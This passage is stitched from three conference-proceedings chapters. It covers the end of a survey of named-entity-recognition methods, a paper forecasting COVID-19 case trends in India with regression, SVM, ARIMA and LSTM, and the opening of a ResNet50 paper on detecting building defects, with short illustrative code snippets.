et al. [25] proposed a multi-task framework with domain adaptation,
where the fully connected layer is adapted to different datasets and
the conditional random field (CRF) [26] features are computed independently.
A significant advantage of Zhao's model is that instances with divergent
distributions and mismatched annotation guidelines are filtered out in the data
selection process. Lin and Lu [27] proposed a transfer approach for NER by
introducing three neural adaptation layers: a word adaptation layer,
a sentence adaptation layer, and an output adaptation layer.
Various NER models have been developed using an MLP with Softmax as the label
decoder. In [28], Softmax is utilized as the label decoder to predict named entities in
Japanese chess (shogi) game commentary as a specific NER task. The model takes as
input both the text and the game board state (9 × 9 squares with 40 pieces of 14 distinct
types) and predicts 21 named entity types specific to this game. Text representations
and game state embeddings are both fed to a softmax layer for the prediction of
named entities using the BIO label scheme.
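Independent of which neural decoder produces the tags, the BIO label scheme itself can be decoded into entity spans with a short routine. The following is a generic sketch of that decoding step, not the model from [28]:

```python
def bio_to_entities(tokens, tags):
    """Decode per-token BIO tags into (entity text, entity type) spans.
    B-X starts an entity of type X, I-X continues it, O is outside."""
    entities, current, etype = [], [], None
    for tok, tag in zip(tokens, tags):
        if tag.startswith("B-"):
            if current:
                entities.append((" ".join(current), etype))
            current, etype = [tok], tag[2:]
        elif tag.startswith("I-") and current and tag[2:] == etype:
            current.append(tok)
        else:  # O, or an I- tag that does not continue the open entity
            if current:
                entities.append((" ".join(current), etype))
            current, etype = [], None
    if current:  # flush an entity that runs to the end of the sentence
        entities.append((" ".join(current), etype))
    return entities

tokens = ["John", "Smith", "visited", "New", "York"]
tags = ["B-PER", "I-PER", "O", "B-LOC", "I-LOC"]
print(bio_to_entities(tokens, tags))
# [('John Smith', 'PER'), ('New York', 'LOC')]
```

This is why the B/I distinction matters: two adjacent entities of the same type stay separate because the second one opens with a fresh B- tag.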
Goyal et al. [15] reviewed improvements and advances made in NER; however, they
do not cover recent advances in deep learning methods. A short outline of recent
progress in NER based on representations of words in sentences is presented by
Yadav and Bethard [29]. That overview focuses on distributed representations for the
input and does not examine the context encoders and label decoders, despite the
ongoing trend of applying deep learning to the task of NER.
An attention mechanism that dynamically decides how much information to use from
the character- or word-level components of an end-to-end NER model was implemented
by Rei et al. [30]. Zukov-Gregoric et al. [31] studied the self-attention mechanism
in NER, where the weights depend on a single sequence (rather than on the relation
between two sequences).
Xu et al. [32] presented an attention-based neural NER architecture that exploits
document-level global information; in particular, the document-level information
is acquired from the document represented by a pretrained bidirectional
language model with neural attention. A robust and adaptive co-attention
network for tweets is utilized by Zhang et al. [33]. This adaptive co-attention
network is a multimodal model using a co-attention process, which includes visual
attention and textual attention to capture the semantic interaction between the
different modalities.
4.1 Challenges
(i) Fine-Grained NER: There needs to be more research on fine-grained NER in
particular domains. There are numerous difficulties in fine-grained NER. One
challenge is the substantially increasing number of NE types, and thereby the
difficulty introduced by allowing a named entity to have multiple NE
types. This calls for a revisit of the fundamental NER approaches in which
boundaries and types are recognized simultaneously. It may be
worth treating named entity boundary identification as a dedicated task
that detects NE boundaries while ignoring NE types.
Separating boundary identification from NE type classification
enables common and robust solutions for boundary identification that can be shared
across different domains, together with dedicated domain-specific techniques for NE
type classification.
(ii) NER on Informal Text with Auxiliary Resources: The performance of deep
learning based NER on informal or user-generated content remains low, so more
research is required in this area. Auxiliary resources are frequently needed for a
better understanding of user-generated content. The main questions are how to obtain
matching auxiliary resources for NER on user-generated content or in a specific
domain, and how to effectively incorporate the auxiliary resources into the NER
task.
(iii) Scalability of NER: Making NER models more scalable is still
a challenging task. Solutions are still needed to handle the limiting factors
that arise as the size of the data grows [34].
Numerous NER models have achieved good performance,
but at the cost of huge computing power. For example, ELMo represents
every word with a 3 × 1024-dimensional vector, and training the model
took 5 weeks on 32 GPUs [35]; Google's BERT was trained
on 64 cloud TPUs. Developing approaches that balance complexity and scalability
would be a promising direction.
5 Conclusion
The named entity recognition (NER) field has been flourishing in recent decades.
Named entity tasks play a very important role in natural language technologies, and
NER is continually being enriched due to its major contribution to numerous natural
language processing (NLP) applications. The aim of this research is to survey recent
studies on NER solutions to help researchers build a strong base in
this field. This research gives researchers insight into the evolution of NER and the
datasets, tools, and techniques that can be employed in NER, and it also helps novice
researchers gain insight into the challenges of NER. In addition, a review of
rule-based, learning-based, and hybrid NER systems has been presented. Across most
of the surveyed papers, we found that supervised learning methods rely on the
availability of an enormous collection of annotated data, whereas unsupervised
learning methods use unannotated data. Various recent studies in the field of
References
1. Nadeau, D., & Sekine, S. (2007). A survey of named entity recognition and classification.
Lingvisticae Investigationes, 30(1), 3–26.
2. Petasis, G., Cucchiarelli, A., Velardi, P., Paliouras, G., Karkaletsis, V., & Spyropoulos, C.
D. (2000). Automatic adaptation of proper noun dictionaries through cooperation of machine
learning and probabilistic methods. Proceedings of SIGIR, 128–135.
3. Li, J., Sun, A., Han, J., & Li, C. (2018). A survey on deep learning for named entity recognition.
IEEE Transactions on Knowledge and Data Engineering, 20.
4. Marrero, M., Urbano, J., Sánchez-Cuadrado, S., Morato, J., & Gómez-Berbís, J. M. (2013).
Named entity recognition: Fallacies, challenges and opportunities. Computer Standards &
Interfaces, 35, 482–489.
5. Weischedel, R., Hovy, E., Marcus, M., Palmer, M., Belvin, R., Pradhan, S., Ramshaw, L., &
Xue, N. (2011). OntoNotes: A large training corpus for enhanced processing. In Handbook of
natural language Processing and machine translation: DARPA global autonomous language
exploitation. Springer.
6. Sang, E. F. T. K. (2002). Introduction to the CoNLL-2002 shared task: Language-independent
named entity recognition. In Proceedings of the 6th Conference on Natural Language Learning
(Vol. 31, pp. 1–4). Stroudsburg, PA, USA: Association for Computational Linguistics.
7. Kim, J. D., & Ohta, T. (2003). GENIA corpus-a semantically annotated corpus for bio-
textmining (Vol. 19).
8. Grishman, R., & Sundheim, B. (1996). Message understanding conference-6: A brief history.
In Proceedings of the 16th Conference on Computational Linguistics, COLING (Vol. 1, pp.
466–471).
9. Bird, S., Loper, E., & Klein, E. (2009). Natural language processing with python (Vol. 36, pp.
767–771). O’Reilly Media Inc.
10. Al-Rfou, R., Kulkarni, V., & Perozzi, B. (2014). POLYGLOT-NER: Massive multilingual named
entity recognition (Vol. 1).
11. Manning, C., Surdeanu, M., & Bauer, J. (2014). The Stanford CoreNLP natural language
processing toolkit. Proceedings of 52nd Annual Meeting of the Association for Computational
Linguistics: System Demonstrations (pp. 55–60).
12. Kang, Y., Cai, Z., Tan, C.-W., Huang, Q., & Liu, H. (2020). Natural language processing (NLP)
in management research: A literature review. Journal of Management Analytics, 7(2), 139–172.
13. Gardner, M., Grus, J., Neumann, M., Tafjord, O., Dasigi, P., Liu, N., Peters, M., Schmitz, M.,
& Zettlemoyer, L. (2017). AllenNLP: A deep semantic natural language processing platform.
In Proceedings of Workshop for NLP Open Source Software (NLP-OSS), Technical report (pp.
1–6).
14. Neumann, M., & King, D. (2019). ScispaCy: Fast and robust models for biomedical natural
language processing. In Proceedings of the BioNLP workshop, 319–327.
15. Goyal, A., Gupta, V., & Kumar, M. (2018). Recent named entity recognition and classification
techniques: A systematic review. Computer Science Review, 29, 21–43.
16. Lin, B. Y., Xu, F., Luo, Z., & Zhu, K. (2017). Multi-channel bilstm-crf model for emerging
named entity recognition in social media. In Proceedings of the 3rd Workshop on Noisy User-
generated Text (pp. 160–165).
17. Peters, M. E., Ammar, W., Bhagavatula, C., & Power, R. (2017). Semisupervised sequence
tagging with bidirectional language models. In Proceedings of ACL (pp. 1756–1765).
18. Collobert, R., Weston, J., Bottou, L., Karlen, M., Kavukcuoglu, K., & Kuksa, P. (2011). Natural
language processing (almost) from scratch. Journal of Machine Learning Research, 12, 2493–
2537.
19. Ju, M., Miwa, M., & Ananiadou, S. (2018). A neural layered model for nested named entity
recognition. Proceedings of NAACL-HLT, 1, 1446–1459.
20. Yang, Z., Salakhutdinov, R., & Cohen, W. (2016). Multi-task cross-lingual sequence tagging
from scratch. arXiv. 2.
21. Rei, M. (2017). Semi-supervised multitask learning for sequence labeling. Proceedings of ACL
(pp. 2121–2130).
22. Nadeau, D., Turney, P. D., & Matwin, S. (2006). Unsupervised named entity recognition:
Generating gazetteers and resolving ambiguity. In Proceedings of the Canadian Society for
Computational Studies of Intelligence (pp. 266–277). Springer.
23. Zhang, S., & Elhadad, N. (2013). Unsupervised biomedical named entity recognition: Experi-
ments with clinical and biological texts. Journal of Biomedical Information, 46, 1088–1098.
24. Däniken, P. V., & Cieliebak, M. (2017). Transfer learning and sentence level features for named
entity recognition on tweets. In Proceedings of the 3rd Workshop on Noisy User-generated Text
(pp. 166–171).
25. Zhao, H., Yang, Y., Zhang, Q., & Si, L. (2018). Improve neural entity recognition via multi-task
data selection and constrained decoding. NAACL-HLT, 2, 346–351.
26. Sutton, C., McCallum, A., & Rohanimanesh, K. (2007). Dynamic conditional random fields:
Factorized probabilistic models for labeling and segmenting sequence data. Journal of Machine
Learning Research, 8, 693–723.
27. Lin, B. Y., & Lu, W. (2018). Neural adaptation layers for cross-domain named entity recogni-
tion. Proceedings of AAAI, 12, 2012–2022.
28. Tomori, S., Ninomiya, T., & Mori, S. (2016). Domain specific named entity recognition refer-
ring to the real world by deep neural networks. Proceedings of ACL, 2, 236–242.
29. Yadav, V., & Bethard, S. (2018). A survey on recent advances in named entity recognition from
deep learning models. In Proceedings of COLING (pp. 2145–2158).
30. Rei, M., Crichton, G. K., & Pyysalo, S. (2016). Attending to characters in neural sequence
labeling models. In Proceedings of COLING (pp. 309–318).
31. Zukov-Gregoric, A., Bachrach, Y., Minkovsky, P., Coope, S., & Maksak, B. (2017). Neural
named entity recognition using a selfattention mechanism. In Proceedings of ICTAI (pp. 652–
656).
32. Xu, G., Wang, C., & He, X. (2018). Improving clinical named entity recognition with global
neural attention. In Proceedings of APWeb-WAIM (pp. 264–279).
33. Zhang, Q., Fu, J., Liu, X., & Huang, X. (2018). Adaptive co-attention network for named entity
recognition in tweets. In AAAI.
34. Batmaz, Z., Yurekli, A., Bilge, A., & Kaleli, C. (2018). A review on deep learning for recom-
mender systems: Challenges and remedies. Artificial Intelligence Review, 1–37.
35. Akbik, A., Blythe, D., & Vollgraf, R. (2018). Contextual string embeddings for sequence
labeling. In Proceedings of COLING (pp. 1638–1649).
Assessing Spatiotemporal Transmission
Dynamics of COVID-19 Outbreak Using
AI Analytics
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 829
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_67
830 M. Gupta et al.
dry, and the sunny climate tends to deteriorate it. The pH of the coronavirus lies between 5.5 and 8.5. COVID-19 is caused by the virus SARS-CoV-2. A related coronavirus, believed to be a microorganism found in bats, was first identified in southern China in 2002; however, it began spreading in other creatures, such as cats, and in people. The COVID-19 outbreak originated in Wuhan, China, in December 2019. Later, it expanded to the whole of China and, subsequently, the whole world. In January 2020, the WHO declared coronavirus a Public Health Emergency of International Concern (PHEIC), and in March 2020, the WHO declared it a pandemic; thus, lockdowns started in many countries. People with weak immunity are the most affected by the coronavirus, especially infants, senior citizens, and people with heart disease and diabetes. In our research work, we have used artificial intelligence (AI) techniques, including linear regression (LR), support vector machine (SVM), long short-term memory (LSTM), and auto-regressive integrated moving average (ARIMA), to predict the trend of COVID-19.
2 Literature Survey
Various works and research have been performed on coronavirus prediction using machine learning (ML) and deep learning (DL) algorithms. In recent research [1], Car et al. in May 2020 aimed to build a valid regression model through an AI algorithm using the dataset employed in their implementation. The main goal of the model is to treat all the gathered data together, instead of splitting it by location, because ML can give insights into the factors surrounding the spread of coronavirus and hence allows us to make accurate predictions. In another paper [2], Sujath et al. in May 2020 presented a model helpful for analyzing the spread of coronavirus. In this, the authors applied multilayer perceptron (MLP), vector autoregression (VAR), and LR strategies to analyze the disease and the movement of coronavirus cases in India. The MLP algorithm showed better prediction outcomes than the LR and VAR techniques, utilizing Orange and WEKA. Tuli et al. in May 2020 presented a model using the Generalized Inverse Weibull distribution, with which a good fit can be achieved to build an analysis framework [3]. It used a cloud computing platform for real-time prediction and greater accuracy in modeling the spread behavior of the pandemic. They selected ML algorithms that can be executed easily on cloud platforms for correct prediction and a prompt response by citizens and governments. In other recent research [2], the authors analyzed the role of ML and AI as important procedures in the areas of prediction, screening, contact tracing, forecasting, and drug development for the virus SARS-CoV-2 and its spread. This research presented diagnosis using ML and AI on 1020 CT images of coronavirus, covering 108 infected patients alongside 86 viral pneumonia patients; using a convolutional neural network (ResNet-101), the radiologist-level results were 83.33% accuracy and 86.27% specificity, respectively.
The research showed that 11 pertinent indices were extracted using the random forest model, with overall correctness of 96.97% and 95.95%, respectively. In yet another recent contribution, Rustam et al. in May 2020 formulated ML models to estimate the number of patients expected to suffer from coronavirus [4]. In this research, the authors used four models: linear regression (LR), least absolute shrinkage and selection operator (LASSO), SVM, and exponential smoothing. In [5], the authors Chaurasia and Pal in July 2020 predicted the further spread of this virus in our country by utilizing time-series data to predict the number of deceased patients globally; the work included time-series predictive modeling using various techniques, searching for the best procedure for analyzing the coronavirus dataset, and using the ARIMA algorithm for future estimation of death rates globally. In paper [6], Khanday et al. in June 2020 classified a textual clinical dataset into different parts utilizing ensemble and classical ML algorithms. They used NLP techniques like term frequency/inverse document frequency, report length, and bag of words (BOW) for optimal feature engineering, and fed the features to ensemble and traditional ML classifiers. Multinomial Naive Bayes and logistic regression showed good results compared to other ML models, with 96.2% testing accuracy. Burdick et al. created a model fitting "boosted" decision trees utilizing the XGBoost classifier algorithm [7]. The XGBoost classifier implements gradient boosting, which uses an ensemble of classifiers that integrates outcomes from multiple decision trees to generate prediction scores. Each tree successively splits the patients into small groups. The splitting continues until a patient reaches a leaf node belonging to one class or another, depending on whether a feature value is above or below some threshold.
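The tree-splitting and score-summing behavior described for XGBoost can be sketched with depth-1 trees (decision stumps); this is a schematic illustration of gradient-boosted scoring with made-up threshold values, not the actual XGBoost API:

```python
def stump(x, threshold, below, above):
    """One tiny tree: route the sample by comparing a feature to a threshold."""
    return below if x < threshold else above

def boosted_score(x, stumps):
    """Gradient boosting combines many small trees by summing their outputs."""
    return sum(stump(x, t, lo, hi) for t, lo, hi in stumps)

# Hypothetical ensemble of three stumps over a single feature
ensemble = [(0.5, -1.0, 1.0), (1.5, -0.5, 0.5), (2.5, -0.25, 0.25)]
score = boosted_score(2.0, ensemble)   # 1.0 + 0.5 - 0.25 = 1.25
```

A positive summed score would place the sample in one class, a negative score in the other.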
Jamshidi et al. in June 2020 responded to the spread of the virus by using DL and AI analytics, including generative adversarial networks (GANs), extreme learning machines, and LSTM, to achieve the target output [8]. The main advantage of these AI applications is to expedite the procedure of treatment and diagnosis of the coronavirus ailment.
3 Proposed Methodology
The following section summarizes the dataset and the proposed methodology for prediction of the COVID-19 trend in India.
Table 1 shows the coronavirus data published by the Center for Systems Science and Engineering (CSSE) at Johns Hopkins University [9]. The dataset consists of 273 rows and 384 columns and shows worldwide instantaneous deaths, total cases, and recoveries, along with latitude and longitude [10]. India, being second largest in world population, draws the special attention of researchers predicting the COVID-19 trend [11]. Hence, another dataset, shown in Table 2, was extracted from the Indian Ministry of Health and Family Affairs, containing seven months of coronavirus data in India from January 30, 2020 to September 2, 2020. This dataset consists of 5861 rows and 9 distinct attributes.
(1) Linear Regression (LR): The linear regression model is

Y = BX + A (1)

In Eq. (1), Y is the dependent variable, X is the independent variable, and A and B are the linear regression coefficients given in Eqs. (3) and (4). The dependent variable Y refers to the final output, and X to the confirmed cases. The goal of linear regression is to minimize the sum of the squared residuals between the observed and predicted values. Hence, it translates to Eqs. (2)–(4):

E = Y(i) − BX(i) − A (2)

A = Ȳ − BX̄ (3)

B = Σᵢ (X(i) − X̄)(Y(i) − Ȳ) / Σᵢ (X(i) − X̄)² (4)

In Eq. (2), E is the residual, i.e., the difference between the actual and predicted value, and Y(i) is the true value of the i-th data point, while Ȳ and X̄ represent the average values of Y and X.
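As a concrete illustration, Eqs. (1)–(4) can be implemented in a few lines of plain Python (a minimal sketch with a toy series; the paper's experiments use library implementations):

```python
def fit_linear_regression(xs, ys):
    """Least-squares fit of Y = B*X + A via Eqs. (3) and (4)."""
    n = len(xs)
    x_bar = sum(xs) / n          # mean of X
    y_bar = sum(ys) / n          # mean of Y
    # Eq. (4): B = sum((X - X_bar)(Y - Y_bar)) / sum((X - X_bar)^2)
    num = sum((x - x_bar) * (y - y_bar) for x, y in zip(xs, ys))
    den = sum((x - x_bar) ** 2 for x in xs)
    b = num / den
    # Eq. (3): A = Y_bar - B * X_bar
    a = y_bar - b * x_bar
    return a, b

# Example: a perfectly linear toy series, y = 2x + 1
a, b = fit_linear_regression([1, 2, 3, 4], [3, 5, 7, 9])
```

Here the fit recovers B = 2 and A = 1 exactly, since the residuals of Eq. (2) are all zero.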
(2) Support Vector Machine (SVM): A support vector machine (SVM) is a supervised learning model used for classification, analyzing data for two-group classification problems [12]. SVM seeks a decision boundary, called a hyperplane, that linearly separates the data points. The margin is the sum of the distances (D⁻ + D⁺) from the hyperplane to the closest points of the two classes. For classifying the data points, the hyperplane with the maximum-width margin is chosen: the wider the margin, the better the accuracy. The margin is inversely proportional to ||w||, where w is the weight vector; therefore, to maximize the margin, ||w|| has to be minimized:

Minimize ||w||² / 2 (5)

There are two commonly used variants of the SVM algorithm: hard SVM and soft SVM. Hard SVM: if the data is perfectly linearly separable, it is beneficial to use the hard SVM formulation, which quickly sketches the decision boundary subject to the constraint

y(i) (wᵀ X(i) − b) ≥ 1 for all 1 ≤ i ≤ n (6)

In Eq. (6), X(i) are the samples or data points, y(i) is the output response, and w is the normal vector to the hyperplane. A second formulation, soft SVM, handles outliers by imposing a smaller penalty on misclassified points:

Minimize ||w||² / 2 + C Σᵢ max(0, 1 − y(i) (wᵀ X(i) + b)) (7)

In Eq. (7), C is the regularization parameter that balances margin width against the misclassification penalty. Thus, the goal of the SVM formulation is to minimize the objective specified in Eq. (7).
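The soft-margin objective in Eq. (7) can be minimized directly by subgradient descent; the sketch below (a hypothetical one-dimensional toy, not the library solver used in the experiments) makes the margin/penalty trade-off explicit:

```python
def train_soft_svm(xs, ys, C=10.0, lr=0.01, epochs=500):
    """Minimize ||w||^2 / 2 + C * sum(max(0, 1 - y*(w*x + b))) for 1-D data."""
    w, b = 0.0, 0.0
    for _ in range(epochs):
        gw, gb = w, 0.0                      # gradient of the margin term
        for x, y in zip(xs, ys):
            if y * (w * x + b) < 1:          # point violates the margin
                gw -= C * y * x              # hinge-loss subgradient
                gb -= C * y
        w -= lr * gw
        b -= lr * gb
    return w, b

xs = [-2.0, -1.0, 1.0, 2.0]   # toy separable data
ys = [-1, -1, 1, 1]
w, b = train_soft_svm(xs, ys)
```

After training, sign(w*x + b) agrees with the labels for every toy point; a larger C would tolerate fewer margin violations at the cost of a narrower margin.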
(3) Auto-Regressive Integrated Moving Average (ARIMA): ARIMA refers to a group of models that use time-series data to better understand and predict future trends from the series' own past values. A model is specified as ARIMA(p, d, q), where p, d, and q are non-negative integers, and can be used to forecast future values. The autoregressive part models the dependent relationship between an observation and some number of lagged observations [13, 14]. The integrated step involves differencing the observed data points in order to make the time series stationary so that it can be analyzed well. The moving-average part models the dependence between an observation and the residual errors from a moving average model applied to lagged observations.
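The "integrated" (d) step is simply repeated differencing; a minimal sketch of first-order differencing and its inverse (which restores a forecast to the original scale) clarifies this, while full ARIMA fitting would typically use a library such as statsmodels:

```python
def difference(series):
    """First-order differencing: makes a trending series closer to stationary."""
    return [b - a for a, b in zip(series, series[1:])]

def undifference(first_value, diffs):
    """Invert differencing by cumulatively summing from the first observation."""
    out = [first_value]
    for d in diffs:
        out.append(out[-1] + d)
    return out

cases = [100, 120, 150, 190, 240]        # toy cumulative case counts
diffs = difference(cases)                 # daily increments: [20, 30, 40, 50]
restored = undifference(cases[0], diffs)  # reconstructs the original series
```

Forecasts made on the differenced (stationary) scale are passed through the inverse step to obtain predicted case totals.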
4 Results
In this research, we have used various AI analytics to predict the trend of coronavirus. The algorithms we used achieved the following accuracies in predicting the coronavirus trend: LR (98%), SVM (72.45%), ARIMA (99.87%), and LSTM (42%). It was observed that the ARIMA model performed best overall, achieving the maximum accuracy (99.87%). In this section, we present the prediction of total coronavirus cases using confirmed, recovered, and death cases as our dominant features. In Fig. 1, we show the total active, cured, and death cases in hotspot countries (China, India, United Kingdom, France, US, and Italy). We then focused our research on coronavirus trend prediction for India and examined the timeline of the confirmed, recovered, and death rates due to coronavirus in India (Fig. 2). Our results show the predicted total cases for India from January 29, 2021 to February 2, 2021, with an average accuracy of 99.87%. The predicted cases were derived from the confirmed cases from January 24, 2021 to January 28, 2021. In Fig. 3, we show the observed regression line and the predicted total cases date-wise for the next 15 days, until February 19. In Fig. 4, we show the predicted cases for the next 120 days: first the actual data of total cases from January 2020 to January 2021, and second the predicted data for the 120 days from January until May 2021.
5 Conclusion
Our research has presented various artificial intelligence techniques to predict the trend of coronavirus in India. The models used include LR, SVM, LSTM recurrent networks, and ARIMA. The forecast was made based on confirmed, cured, and deceased cases. The results are also presented graphically for better understandability of the predicted results. The AI analytics we used achieved the following accuracies in predicting the coronavirus trend: LR (98%), SVM (72.45%), ARIMA (99.87%), and LSTM (42%). Linear regression and the ARIMA model give the best results, with maximum accuracy (98% and 99.87%, respectively), and performed better
References
1. Magazzino, C., Mele, M., & Schneider, N. (2021). A Machine Learning approach on the rela-
tionship among solar and wind energy production coal consumption GDP and CO2 emissions.
Renewable Energy, 167, 99–115.
2. Kavadi, D. P., Patan, R., Ramachandran, M., & Gandomi, A. H. (2020). Partial derivative
nonlinear global pandemic machine learning prediction of Covid 19. Chaos, Solitons &
Fractals, 139, 110056.
3. Sharma, S. (2020). Drawing insights from COVID-19-infected patients using CT scan images
and machine learning techniques: A study on 200 patients. Environmental Science and Pollution
Research, 27(29), 37155–37163.
4. Tuli, S., Tuli, S., Tuli, R., & Gill, S. S. (2020). Predicting the growth and trend of COVID-19
pandemic using machine learning and cloud computing. Internet of Things, 11, 100222.
5. Chaurasia, V., & Pal, S. (2020). Covid-19 pandemic: Application of machine learning time
series analysis for prediction of human future. Available at SSRN 3652378.
6. Lalmuanawma, S., Hussain, J., & Chhakchhuak, L. (2020). Applications of machine learning
and artificial intelligence for Covid-19 (SARS-CoV-2) pandemic: A review. Chaos, Solitons
and Fractals, 110059.
7. Rustam, F., Reshi, A. A., Mehmood, A., Ullah, S., On, B.-W., Aslam, W., & Choi, G. S.
(2020). COVID-19 future forecasting using supervised machine learning models. IEEE Access,
8, 101489–101499.
8. Nayak, J., Naik, B., Dinesh, P., Vakula, K., Kameswara Rao, B., Ding, W., & Pelusi, D. (2021).
Intelligent system for COVID-19 prognosis: A state-of-the-art survey. Applied Intelligence,
1–31.
9. Gujral, H., & Sinha, A. (2021). Association between exposure to airborne pollutants and
COVID-19 in Los Angeles, United States with ensemble-based dynamic emission model.
Environmental Research, 194, 110704.
10. COVID-19 Data Repository by the Center for Systems Science and Engineering (CSSE) at
Johns Hopkins University.
11. COVID-19 India dataset, data extracted from the Ministry of Health and Family Affairs.
12. Sinha, A., & Rathi, M. (2021). COVID-19 prediction using AI analytics for South Korea.
Applied Intelligence, 1–19.
13. Sharma, R. R., Kumar, M., Maheshwari, S., & Ray, K. P. (2020). EVDHM-ARIMA-based
time series forecasting model and its application for COVID-19 cases. IEEE Transactions on
Instrumentation and Measurement, 70, 1–10.
14. Singh, S., Chowdhury, C., Panja, A. K., & Neogy, S. (2021). Time series analysis of COVID-19
data to study the effect of lockdown and unlock in India. Journal of The Institution of Engineers
(India): Series B, 1–7.
Detection of Building Defects Using
Convolutional Neural Networks
Abstract Deep learning has intervened in almost all domains. Across various fields, researchers have introduced deep learning techniques in several phases, such as detecting damage, predicting the robustness of repair mortars, and various other activities. A crucial and significant task of building maintenance is to detect damage in wall surfaces at an early stage. The issue becomes complex when the number of buildings is huge. Hence, many maintenance engineers and researchers look for a better solution. The objective of this work is to locate the types of several defects that are encountered during the construction phase. This work focuses on four major defects: spalls, flakes, cracks, and molds. The proposed model is based on ResNet50 and a dataset that consists of 555 images for training and 176 images for testing. Detection of the type of defect is also handled by this model. An accuracy of 81% with a loss of 0.02 has been obtained through model deployment. This approach is found to be robust and provides accurate results.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 839
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_68
840 D. S. S. Bhavani et al.
1 Introduction
The field of civil engineering has an extensive range of issues, such as planning wastewater treatment plant operation [1], modeling stress–strain associations [2], and other architectural designs [2], that could be solved by the application of deep learning algorithms. Among these activities, the construction of buildings has increased due to population growth, resulting in high-rise buildings, especially apartments. The construction business is growing tremendously along with technology, irrespective of the high cost of building materials. Many builders construct buildings by mixing concrete powder instead of using sand, which is low-budget and yields good profits. Due to this, the condition of the building might deteriorate in the future, and there are chances of defects like cracks and spalls. This is the predominant issue that arises frequently and needs to be resolved. Since many constructed buildings are high-rise, it would be very difficult and time-consuming to identify building defects manually. To overcome this problem, deep learning and machine learning image analysis algorithms have been used to identify the type of building defect by analyzing the image. A genetic algorithm and percolation model have been proposed by Qu et al. [3, 4]. In this, the authors worked on a model for the detection of cracks on concrete pavement under several kinds of noise. In [5], the Zernike moment operator works behind the crack width detection approach; here, a dual-scale CNN has been deployed for the detection of crack width. A crack detection approach based on a deep convolutional neural architecture has been suggested in [6], which combines multiscale and multilevel information about the target object.
In 2020, Qu et al. [7] performed crack detection through the deployment of a convolutional neural network. As the first step, the cracks were classified with the help of various deep learning models. Considering the low percentage of effective concrete pavement crack images among the mass of images collected by the crack detection vehicle, the output dimension was modified before crack detection. Efficiency was augmented by scaling the network model horizontally, and the convolution layers use kernel sizes of 1 × 1 and 3 × 3. It was compared with the VGG16 network [8], from which it was observed that it is not capable enough, as only cracks were used for detection. An updated model of the VGG16 network has been proposed by the authors in the present work. This model employs ResNet50, which has several network layers used to extract features from images using a CNN.
In ResNet [9], it is possible to train neural networks of about 152 layers. There are several ResNet variants, e.g., ResNet18, ResNet50, and ResNet152. We implemented ResNet50 in our model for the detection task. The main advantage of using this model is that ResNet50 uses skip connections, as illustrated in Fig. 1 [10], where the shortcut skips layers and is added back just before the ReLU activation function to acquire better accuracy. We generally use two different blocks in ResNet50. If the input size is equal to the output size, then we use an identity block; otherwise, a convolution block is used. In the convolution block, an extra convolution layer is added in the skip connection.
Figure 2 represents the architecture of ResNet50 [11], which consists of four stages of blocks. The input layer has 64 filters of size 7 × 7, followed by a max pooling layer with a 3 × 3 filter and stride 2. In each stage, each block uses three layers. In stage 1, the first layer uses 64 filters of size 1 × 1, the second layer 64 filters of size 3 × 3, and the third layer 256 filters of size 1 × 1. Stage 1 is repeated three times, so a total of nine layers is obtained (3 layers × 3 times = 9). In stage 2, the first layer uses 128 filters of size 1 × 1, the second layer 128 filters of size 3 × 3, and the third layer 512 filters of size 1 × 1. Stage 2 is repeated four times, giving a total of 12 layers (3 layers × 4 times = 12). In stage 3, the first layer uses 256 filters of size 1 × 1, the second layer 256 filters of size 3 × 3, and the third layer 1024 filters of size 1 × 1. Stage 3 is repeated six times, so a total of 18 layers (3 layers × 6 times = 18) results. In stage 4, the first layer uses 512 filters of size 1 × 1, the second layer 512 filters of size 3 × 3, and the third layer 2048 filters of size 1 × 1. Stage 4 is repeated three times, yielding a total of nine layers (3 layers × 3 times = 9). The output layer is fully connected and uses pooling and softmax as the activation function. So, the total number of layers used in the ResNet50 architecture is 1 + 9 + 12 + 18 + 9 + 1 = 50.
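The skip-connection idea behind the two block types can be sketched abstractly (a schematic toy on small vectors, not the actual convolutional layers): the block's transformation is added to its input (identity block) or to a projected input (convolution block) before the final ReLU.

```python
def relu(v):
    return [max(0.0, x) for x in v]

def identity_block(x, transform):
    """Input and output sizes match: add the input straight to the output."""
    return relu([t + s for t, s in zip(transform(x), x)])

def conv_block(x, transform, project):
    """Sizes differ: project the shortcut (the extra conv layer) before adding."""
    return relu([t + s for t, s in zip(transform(x), project(x))])

# Toy 2-unit example with a hypothetical linear "transform"
out = identity_block([1.0, 2.0], lambda v: [u - 3.0 for u in v])
# transform gives [-2.0, -1.0]; adding the shortcut gives [-1.0, 1.0]; ReLU -> [0.0, 1.0]
```

Because the shortcut carries the input forward unchanged, the block only has to learn a residual correction, which is what makes very deep networks like ResNet50 trainable.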
The architecture of AlexNet:
AlexNet [12, 13] is one of the algorithms used to solve the problem of image classification. It consists of 60 million parameters. If the input size of an RGB image is 256 × 256, then all the images of the training and test sets would have a size of 256 × 256. The architecture of AlexNet is shown in Fig. 3.
Fig. 3 Architecture of AlexNet

From the architecture shown in Fig. 3, we can observe that AlexNet consists of 1 softmax layer, 2 fully connected layers, 3 overlapping max pooling layers, 2 normalization layers, and 5 convolutional layers. Convolution layers operating on the same image size can have different numbers of kernels. Looking at the architecture: initially, a convolution layer with stride 4 and 96 kernels of size 11 × 11 is used, followed by an overlapping max pooling layer of size 3 × 3 with stride 2. Then, a convolution layer of size 5 × 5 with 256 kernels and padding 2 is applied, again followed by an overlapping max pooling layer of size 3 × 3 with stride 2. Then, three convolution layers with 384 kernels of size 3 × 3 and padding 2 are connected directly to each other, followed by an overlapping max pooling layer of size 3 × 3 with stride 2. Finally, two fully connected layers of 4096 units are followed by the output layer, a 1000-way softmax, which gives the distribution over about 1000 class labels. Each convolution layer contains convolution filters along with a nonlinear activation function, i.e., ReLU [14]. ReLU is applied after every convolution layer and fully connected layer. Dropout is applied before the two fully connected layers. Dropout is a method introduced by G. E. Hinton in which a neuron is dropped from the network so that it contributes to neither the forward nor the backward propagation. This increases the number of iterations needed, but without dropout our model would overfit significantly.
